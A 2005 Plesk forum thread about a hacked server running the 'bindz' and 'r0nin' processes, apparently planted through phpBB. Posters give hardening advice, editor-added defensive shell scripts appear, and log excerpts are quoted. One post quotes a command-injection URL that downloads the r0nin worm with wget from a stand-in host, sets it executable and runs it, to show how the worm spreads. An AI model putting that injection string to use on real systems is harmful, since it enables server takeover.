
Server hacked, but always was updated PLESK 7.5.3

Discussion in 'Plesk for Linux - 8.x and Older' started by graffix, May 26, 2005.

  1. graffix

    graffix Guest

    0
     
    Hello,

    We're very angry about this, and we found no security problem on our server.

    We added a new domain for a client and saw that httpd doesn't start.

    We logged into the server and saw that 443 was already in use.

    Under ps -axu we now see these two services:

    ./bindz
    &
    ./r0nin

    We killed them and httpd started normally.

    But why did these two services appear on the updated machine?

    We use RedHat FC2; yum is up to date, so we don't see the security problem!

    Can anybody help us resolve this problem? We opened a ticket with sw-soft, but no answer so far!

    Thanks for the help.
     
  2. Griffith

    Griffith Guest

    0
     
    This is probably not a Plesk issue, rather a security issue on your server... check that you have mod_security, a firewall etc. .. many posts about this in the forums...
     
  3. tandberg

    tandberg Guest

    0
     
    The processes you mention are mostly installed via phpBB, postNuke etc.
    If you have rootkits etc. on the server, the best solution is to do a clean reinstall, as many binaries can be affected, opening backdoors.
    After a clean install remount your /tmp dir noexec, and remove gcc and wget from the server.
    Have a look at the existing httpd dirs for phpBB and postNuke and update asap.
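As an added example (editor's code, not from tandberg's post or from any Plesk tool), the following POSIX shell script checks the two things this advice turns on: whether /tmp is a real mount carrying noexec/nosuid/nodev (a plain directory cannot carry mount options at all), and which executable files are already sitting in a scratch directory. The mount tables and file names in it are constructed for the demo; on a live host you would feed it /proc/mounts and the real /tmp.

```shell
#!/bin/sh
# Added example (not from the thread): verify that /tmp is a separate mount
# carrying noexec,nosuid,nodev, and list executable files that were dropped
# into a scratch directory. Only POSIX sh, awk and find are used.

# check_tmp_mount MOUNTPOINT  (mount table on stdin, /proc/mounts format:
#   device mountpoint fstype options dump pass)
# Prints "ok", "missing: <opts>" or "not-a-mount".
check_tmp_mount() {
  mp="$1"
  opts=$(awk -v mp="$mp" '$2 == mp { print $4; exit }')
  if [ -z "$opts" ]; then
    echo "not-a-mount"        # just a directory: no mount options apply
    return 0
  fi
  missing=""
  for want in noexec nosuid nodev; do
    case ",$opts," in
      *",$want,"*) ;;                    # option present
      *) missing="$missing $want" ;;     # option absent
    esac
  done
  if [ -z "$missing" ]; then
    echo "ok"
  else
    echo "missing:$missing"
  fi
}

# list_exec_files DIR [USER]
# Lists regular files under DIR with the owner-execute bit set, optionally
# restricted to files owned by USER (e.g. apache). A noexec mount only stops
# these from running; they still have to be found and removed.
list_exec_files() {
  dir="$1"
  if [ -n "${2:-}" ]; then
    find "$dir" -xdev -type f -perm -100 -user "$2" 2>/dev/null | sort
  else
    find "$dir" -xdev -type f -perm -100 2>/dev/null | sort
  fi
}

# Constructed mount tables for the demo below (not taken from any real host).
MOUNTS_HARDENED='/dev/sda1 / ext3 rw 0 0
tmpfs /tmp tmpfs rw,noexec,nosuid,nodev 0 0'
MOUNTS_WEAK='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw 0 0'
MOUNTS_PLAIN_DIR='/dev/sda1 / ext3 rw 0 0'

# Demo: run the check against each table. On a real host use:
#   check_tmp_mount /tmp < /proc/mounts
# Turning a directory-only /tmp into a restricted mount (as root) is e.g.:
#   mount -t tmpfs -o noexec,nosuid,nodev tmpfs /tmp
# (existing contents are hidden underneath; add an /etc/fstab entry to persist).
for tbl in "$MOUNTS_HARDENED" "$MOUNTS_WEAK" "$MOUNTS_PLAIN_DIR"; do
  printf '/tmp -> %s\n' "$(printf '%s\n' "$tbl" | check_tmp_mount /tmp)"
done
```

Run it as a file, or source it and call `check_tmp_mount /tmp < /proc/mounts` and `list_exec_files /tmp apache` directly; the same check applies to /var/tmp and /dev/shm, which later posts in this thread mention as alternative drop locations.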
     
  4. graffix

    graffix Guest

    0
     
    Thanks for the replies, but I think it is still largely a Plesk problem: execution rights on /tmp are very risky?!

    Confixx has the same issue. Other panels don't have the same problem.

    Luckily, wget was renamed on this server, so no other files were loaded onto the server.

    I'm running chkrootkit to see if anything else is infected.
     
  5. tandberg

    tandberg Guest

    0
     
    Just have a look at how the "tools" spread:

    http://www.to.be.infected.pc/test.gif?&cmd=cd /;cd tmp;mkdir%...
    %20.x;wget%20www.havingworm.pc/worm/r0nin;chmod%20777%20r0nin;./r0nin

    Making /tmp noexec would leave the binary in /tmp but not executed. Never compile chkrootkit on an infected system. Build it elsewhere, then check with the statically compiled version. :)
    Again, this is not a Plesk issue - that's a PHP problem. ;)
     
  6. jshanley

    jshanley Guest

    0
     
    It's not technically a Plesk issue, but Plesk does distribute a vulnerable (hackable) version of phpBB in their Application Vault, right? I don't think they've updated the application to a non-vulnerable version. So I think if you use the Application Vault version of phpBB, you will get hacked again.
     
  7. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    Some real lightweight forensics here: before killing the process, look to see what user it is running as (ps aux). If it is running as apache, it's most likely an exploitable PHP app. If it's running as some other user, probably an exploitable cgi-bin app, and if it's running as root, it was probably an exploitable service.

    I've got RPMs for chkrootkit and rkhunter in my archive, and in addition I've been developing a security suite targeted at securing hosting servers called Atomic Secured Linux (ASL). That project includes both a kernel hardened specifically for security, and an intrusion detection/response layer with mod_security and mod_dosevasive. We also currently maintain the largest signature database for mod_security (well over a thousand signatures at this date).
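As an added example (editor's code, not from atomicturtle's post and not part of ASL), here is a small POSIX shell triage that applies the rule of thumb above to `ps aux` output: it flags processes launched from a scratch directory or via a relative `./` path, and reports what the owning user implies, before anything is killed. The `ps` sample is constructed, with `./bindz` and `./r0nin` mirroring the process names in this thread; `inspect_pid` assumes a Linux /proc filesystem.

```shell
#!/bin/sh
# Added example (not from the thread): triage `ps aux` output before killing
# anything. Flags processes whose command was launched from a scratch or
# relative path and says what the owning user implies. The hints follow the
# post's rule of thumb; the wording is the editor's, not ASL's.

# triage_ps  (ps aux output on stdin)
# Prints one SUSPICIOUS/CRITICAL line plus a hint per flagged process.
triage_ps() {
  awk '
    NR == 1 { next }                        # skip the ps header line
    {
      user = $1; pid = $2
      cmd = $11                             # COMMAND is field 11 onwards
      for (i = 12; i <= NF; i++) cmd = cmd " " $i
      # Binaries started from /tmp-like dirs or via "./" are the usual sign
      # of a dropped payload such as the ./bindz and ./r0nin in this thread.
      if (cmd !~ /^(\.\/|\/tmp\/|\/var\/tmp\/|\/dev\/shm\/)/) next
      if (user == "apache" || user == "www-data" || user == "nobody") {
        level = "SUSPICIOUS"
        hint = "runs as the web server user: look for an exploitable PHP app"
      } else if (user == "root") {
        level = "CRITICAL"
        hint = "runs as root: an exploited service, treat the host as fully compromised"
      } else {
        level = "SUSPICIOUS"
        hint = "runs as " user ": look at cgi-bin scripts or that account"
      }
      printf "%s pid=%s user=%s cmd=%s\n  -> %s\n", level, pid, user, cmd, hint
    }'
}

# inspect_pid PID
# What to record before killing: the real binary, its working directory and
# open sockets (the thread's processes had taken port 443). Linux /proc only.
inspect_pid() {
  pid="$1"
  printf 'exe: '; readlink "/proc/$pid/exe" 2>/dev/null || echo '?'
  printf 'cwd: '; readlink "/proc/$pid/cwd" 2>/dev/null || echo '?'
  ls -l "/proc/$pid/fd" 2>/dev/null | grep socket
}

# Constructed ps aux sample (not real output); ./bindz and ./r0nin mirror the
# process names reported in the thread.
SAMPLE_PS='USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  2048  600 ?        S    May25   0:03 init
apache    2905  0.0  0.5 12000 4000 ?        S    10:12   0:00 ./bindz
apache    2906  0.0  0.5 12000 4000 ?        S    10:12   0:00 ./r0nin
root      3001  0.0  0.6 22000 6000 ?        Ss   10:13   0:00 /usr/sbin/httpd -k start
user1     3100  0.0  0.2  5000 1500 ?        S    10:14   0:00 /tmp/.x/sh'

printf '%s\n' "$SAMPLE_PS" | triage_ps
# On a live host:  ps aux | triage_ps ; inspect_pid 2905
```

The path test is deliberately narrow; a process whose binary was deleted after launch still shows its original path in `/proc/PID/exe` (suffixed "(deleted)" on Linux), which is why `inspect_pid` belongs before the kill, not after.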
     
  8. graffix

    graffix Guest

    0
     
    Thanks for the answers ...
    it's very difficult to find which customer's/client's
    PHP program has a vulnerability.

    We moved the backdoor programs to a secure home dir.

    But why do all PHP programs use /tmp instead of /home/httpd/vhosts/phptemp, and run with only user rights instead of as apache?

    Whatever, we must search for a good way to secure our server.

    Is using Virtuozzo more stable? The kernel there is smaller and not overloaded, but the build? Very old, 2.4.xx

    Does someone have a good idea?

    Thanks
     
  9. Cranky

    Cranky Guest

    0
     
    2.4.xx kernels are fine if you're running Virtuozzo ... the latest Virtuozzo kernel for VZ 2.6.1 is 2.4.20-021stab028.12.777; a 2.6.x kernel is due later in the year.

    You need to make sure you're running a firewall, try mod_security to tighten up security, and rkhunter/chkrootkit as suggested, and you might find whether you've been rooted.

    Your best bet if you're running the Virtuozzo node would be to create another VE and copy the Plesk data across from your existing VE to ensure you're running safe binaries. Alternatively you could just create a new VE and copy the binaries from that to your existing server. MAKE BACKUPS FIRST.
     
  10. BoXie

    BoXie Guest

    0
     
    I had this exact same process running some time ago: 'r0nin'.

    It was a phpBB exploit and had some garbage in /tmp also.

    No more phpBB on my servers!! Last week another phpBB exploit came in .. on the previous version of phpBB.

    phpBB is as leaky as a fishing net. (That is how we Dutch people would say that ;)
     
  11. smtalk

    smtalk Guest

    0
     
    Just secure your /tmp
     
  12. BoXie

    BoXie Guest

    0
     
    Is there a way to secure /tmp if it isn't mounted, but is just a directory?
     
  13. Griffith

    Griffith Guest

    0
     
    Even though you secure /tmp they can still run .pl files etc.. (correct me if I'm wrong)
     
  14. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    /tmp isn't really enough, the bad guys can run their exploits from any directory writable by the webserver. I see them running in the users' httpdocs these days as often as I see them running from /tmp or /var/tmp. Here are a few examples of what ASL has caught:

    From 172.150.XX.XXX: denied untrusted exec of /var/tmp/za/zero by /bin/bash[sh:2905] uid/euid:48/48 gid/egid:48/48, parent /bin/bash[sh:32502] uid/euid:48/48 gid/eg8

    Attacker trying to run /var/tmp/za that they've uploaded, as apache (48/48).

    Here's another system where they're running it from the user's directory:
    From 83.91.XX.XX denied untrusted exec of /home/httpd/vhosts/DOMAIN.COM/httpdocs/albums/DOMAIN/img/.htaccess/.kiki/y2kupdate by /bin/bash[sh:20555] uid/euid:48/48 gid/egid:48/48

    This time the attacker shifted the exploit to a writable home directory, as /tmp was mounted noexec. Side note on this one: the app exploited was 100% custom code, so this wasn't your standard canned phpBB attack.

    In both cases however, the attack didn't work (although the applications were still exploitable) since ASL treats apache as an untrusted user, and will only let it execute apps owned by root. It's a simple way to in essence make the whole system noexec, but without the collateral damage that would cause otherwise.
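As an added example (editor's code, not from atomicturtle's post and not ASL's own tooling), here is a POSIX shell parser for the "denied untrusted exec" lines quoted above. It turns each denial into a tab-separated record saying where the payload lived (scratch directory vs. web root), whether it was hidden inside a dot-directory, and which uid ran it, which is the information a defender wants when deciding whether a noexec /tmp is enough. The line format is inferred from the two quoted lines only; both are used unchanged (with the IPs as the poster masked them) as the sample input.

```shell
#!/bin/sh
# Added example (not from the thread or from ASL): summarise trusted-path
# execution denials. The line format is inferred from the two quoted lines.

# parse_tpe_log  (log lines on stdin)
# Emits: <source> <path> <interpreter> <uid> <euid>, one record per denial.
# The source may or may not be followed by a colon (both forms appear above).
parse_tpe_log() {
  sed -n 's|^From \([0-9.A-Za-z]*\):\{0,1\} denied untrusted exec of \([^ ]*\) by \([^[]*\)\[[^]]*\] uid/euid:\([0-9]*\)/\([0-9]*\).*|\1 \2 \3 \4 \5|p'
}

# classify_exec_path PATH -> tmp | webroot | other
classify_exec_path() {
  case "$1" in
    /tmp/*|/var/tmp/*|/dev/shm/*) echo "tmp" ;;      # a noexec mount covers these
    */httpdocs/*|*/cgi-bin/*)     echo "webroot" ;;  # writable web root: noexec /tmp does not help
    *)                            echo "other" ;;
  esac
}

# report_tpe_denials  (log lines on stdin)
# One tab-separated record per denial:
#   location  source  path  uid=N/N  hidden=yes|no  interpreter
report_tpe_denials() {
  parse_tpe_log | while read -r src path interp uid euid; do
    loc=$(classify_exec_path "$path")
    hidden=no
    case "$path" in */.*) hidden=yes ;; esac   # payload inside a dot-directory
    printf '%s\t%s\t%s\tuid=%s/%s\thidden=%s\t%s\n' \
      "$loc" "$src" "$path" "$uid" "$euid" "$hidden" "$interp"
  done
}

# Sample input: the two lines quoted in the post above, unchanged.
SAMPLE_TPE_LOG='From 172.150.XX.XXX: denied untrusted exec of /var/tmp/za/zero by /bin/bash[sh:2905] uid/euid:48/48 gid/egid:48/48, parent /bin/bash[sh:32502] uid/euid:48/48 gid/eg8
From 83.91.XX.XX denied untrusted exec of /home/httpd/vhosts/DOMAIN.COM/httpdocs/albums/DOMAIN/img/.htaccess/.kiki/y2kupdate by /bin/bash[sh:20555] uid/euid:48/48 gid/egid:48/48'

printf '%s\n' "$SAMPLE_TPE_LOG" | report_tpe_denials
```

Piping a day's worth of such lines through `report_tpe_denials | cut -f1 | sort | uniq -c` gives the split between scratch-directory and web-root launches, which is the number that tells you whether hardening /tmp alone would have changed anything on your host.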
     
  15. Griffith

    Griffith Guest

    0
     
    Is it possible to get more info about asl?
     
  16. atomicturtle

    atomicturtle Golden Pleskian

    29
     
  17. BoXie

    BoXie Guest

    0
     
    I'm not a real Linux guru .. but isn't ASL a little bit like SELinux ?
     
  18. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Yes, SELinux is a subset of what is available in ASL with 2.6 kernels. In addition to that, ASL includes more kernel-based hardening with grsec/PaX, and userspace intrusion detection/response with mod_security and mod_dosevasive. We currently maintain the largest archive of mod_security signatures (well over 1000 now) through our security portal at gotroot.com.

    The idea is to approach this with a security-in-depth model: TPE (trusted path execution), RBAC (grsec and SELinux), IDS (mod_security/mod_dosevasive), PaX (grsec), etc. all support each other. If an attacker can defeat one component, there are other pieces in the system to catch those failures.
     
  19. jshanley

    jshanley Guest

    0
     
    A+

    In short, Atomic is trying to save admins the time and work involved in setting up a much more hardened Linux environment, from which they can run Plesk. In exchange, all he asks for is a couple bucks for the effort.

    If I ran Plesk on Linux, I'd seriously consider it - not because I can't do those things myself, but because it saves a lot of time and effort that could be spent elsewhere on the business.

    Anyway. I suppose I'm leaning dangerously close to "promotion" here, so I'll stop :p He definitely knows what he's doing, though.
     
  20. Griffith

    Griffith Guest

    0
     
    Atomic: if I use the mod_security rules at gotroot.com, are there any "problems" since the rulefiles are big?
     